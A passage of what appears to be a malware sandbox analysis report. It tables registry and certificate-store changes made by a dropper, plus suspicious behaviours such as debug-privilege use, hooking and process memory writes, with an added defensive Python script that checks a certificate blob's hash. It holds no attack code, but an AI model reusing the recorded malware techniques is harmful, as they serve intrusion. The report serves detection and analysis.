| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
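What this entry is, and how to check it: the key sits under `AuthRoot`, the store Windows fills on its own when a certificate chain is built to a root from the Microsoft Trusted Root Program, and the blob's friendly-name property reads `Sectigo (AAA)` while the DER carries the subject `AAA Certificate Services` / `Comodo CA Limited`. The most likely cause is therefore a TLS connection by the dropper that chained to that public root, not the malware planting a trust anchor of its own. A planted root would look identical in this table, so the check that settles it is to parse the blob and compare the SHA-1 the OS recorded, and the hash of the certificate itself, against the key name. The Python below is an added example, not code from the report or the sandbox vendor; it embeds the leading part of the blob above, stopping before property 32 (the 1,078-byte DER certificate, omitted here for length), so the certificate-hash step reports `None` on this input and only runs on a complete blob. Property IDs other than 3, 9, 11, 20 and 32 are reported by number only.

```python
"""Parse a serialized certificate Blob as written by Windows under
SystemCertificates\\...\\Certificates\\<SHA1>\\Blob and cross-check it.

The value is a sequence of CERT_*_PROP_ID records, each laid out as
    DWORD propid | DWORD reserved (always 1) | DWORD length | data
Property 32 (CERT_CERT_PROP_ID) holds the DER certificate itself.
Added example; the registry data below is copied from the report.
"""
from __future__ import annotations

import hashlib
import struct

# wincrypt.h property IDs this script interprets; everything else is listed by number.
CERT_SHA1_HASH_PROP_ID = 3
CERT_ENHKEY_USAGE_PROP_ID = 9
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_KEY_IDENTIFIER_PROP_ID = 20
CERT_CERT_PROP_ID = 32

# Registry key name from the report: the SHA-1 thumbprint the store indexes the entry by.
KEY_NAME = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"

# Leading part of the Blob value from the report, cut just before property 32
# (the 1,078-byte DER certificate), which is omitted here for length.
BLOB_PREFIX = bytes.fromhex(
    "5c000000" "01000000" "04000000" "00080000"
    "0f000000" "01000000" "14000000" "3e8e6487f8fd27d322a269a71edaac5d57811286"
    "09000000" "01000000" "54000000"
    "305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b06010505070307"
    "06082b0601050507030106082b06010505070308"
    "53000000" "01000000" "43000000"
    "30413022060c2b06010401b2310102010501" "30123010060a2b0601040182373c0101030200c0"
    "301b060567810c0103" "30123010060a2b0601040182373c0101030200c0"
    "62000000" "01000000" "20000000"
    "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"
    "0b000000" "01000000" "1c000000" "5300650063007400690067006f002000280041004100410029000000"
    "14000000" "01000000" "14000000" "a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "1d000000" "01000000" "10000000" "2e0d6875874a44c820912e85e964cfdb"
    "03000000" "01000000" "14000000" "d1eb23a46d17d68fd92564c2f1f1601764d8e349"
    "19000000" "01000000" "10000000" "2aa1c05e2ae606f198c2c5e937c97aa2"
)


def parse_cert_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the record sequence; raise on a truncated or malformed record rather than guess."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        propid, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed or truncated record propid={propid} at offset {off - 12}")
        props[propid] = blob[off:off + length]
        off += length
    return props


def der_oid_sequence(der: bytes) -> list[str]:
    """Decode a DER SEQUENCE OF OBJECT IDENTIFIER with short-form lengths (enough for EKU lists)."""
    if der[0] != 0x30 or der[1] & 0x80:
        raise ValueError("not a short-form SEQUENCE")
    body, i, oids = der[2:2 + der[1]], 0, []
    while i < len(body):
        if body[i] != 0x06:
            raise ValueError("expected OBJECT IDENTIFIER")
        n = body[i + 1]
        raw = body[i + 2:i + 2 + n]
        i += 2 + n
        arcs, val = [raw[0] // 40, raw[0] % 40], 0
        for b in raw[1:]:  # base-128 arcs, high bit set on continuation bytes
            val = (val << 7) | (b & 0x7F)
            if not b & 0x80:
                arcs.append(val)
                val = 0
        oids.append(".".join(map(str, arcs)))
    return oids


def summarize(blob: bytes, key_name: str) -> dict:
    """Pull the human-relevant properties and check both hashes against the key name."""
    props = parse_cert_blob(blob)
    known = (CERT_SHA1_HASH_PROP_ID, CERT_ENHKEY_USAGE_PROP_ID, CERT_FRIENDLY_NAME_PROP_ID,
             CERT_KEY_IDENTIFIER_PROP_ID, CERT_CERT_PROP_ID)
    sha1_prop = props[CERT_SHA1_HASH_PROP_ID].hex().upper()
    der = props.get(CERT_CERT_PROP_ID)
    return {
        "friendly_name": props[CERT_FRIENDLY_NAME_PROP_ID].decode("utf-16-le").rstrip("\0"),
        "key_identifier": props[CERT_KEY_IDENTIFIER_PROP_ID].hex(),
        "eku": der_oid_sequence(props[CERT_ENHKEY_USAGE_PROP_ID]),
        "other_propids": sorted(p for p in props if p not in known),
        "sha1_prop": sha1_prop,
        # The hash the OS recorded should equal the key name ...
        "sha1_prop_matches_key": sha1_prop == key_name.upper(),
        # ... and so should the hash of the certificate itself; None when property 32 is absent.
        "der_sha1_matches_key": None if der is None
        else hashlib.sha1(der).hexdigest().upper() == key_name.upper(),
    }


if __name__ == "__main__":
    for key, value in summarize(BLOB_PREFIX, KEY_NAME).items():
        print(f"{key}: {value}")
```

On a full blob exported from a suspect host (`reg export` the key, or read the value with `Get-ItemPropertyValue`), a `False` in `der_sha1_matches_key` means the stored certificate does not match the thumbprint the key claims, and an unfamiliar friendly name or subject under `ROOT` rather than `AuthRoot` is the case that deserves attention.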
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\RunDll32.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
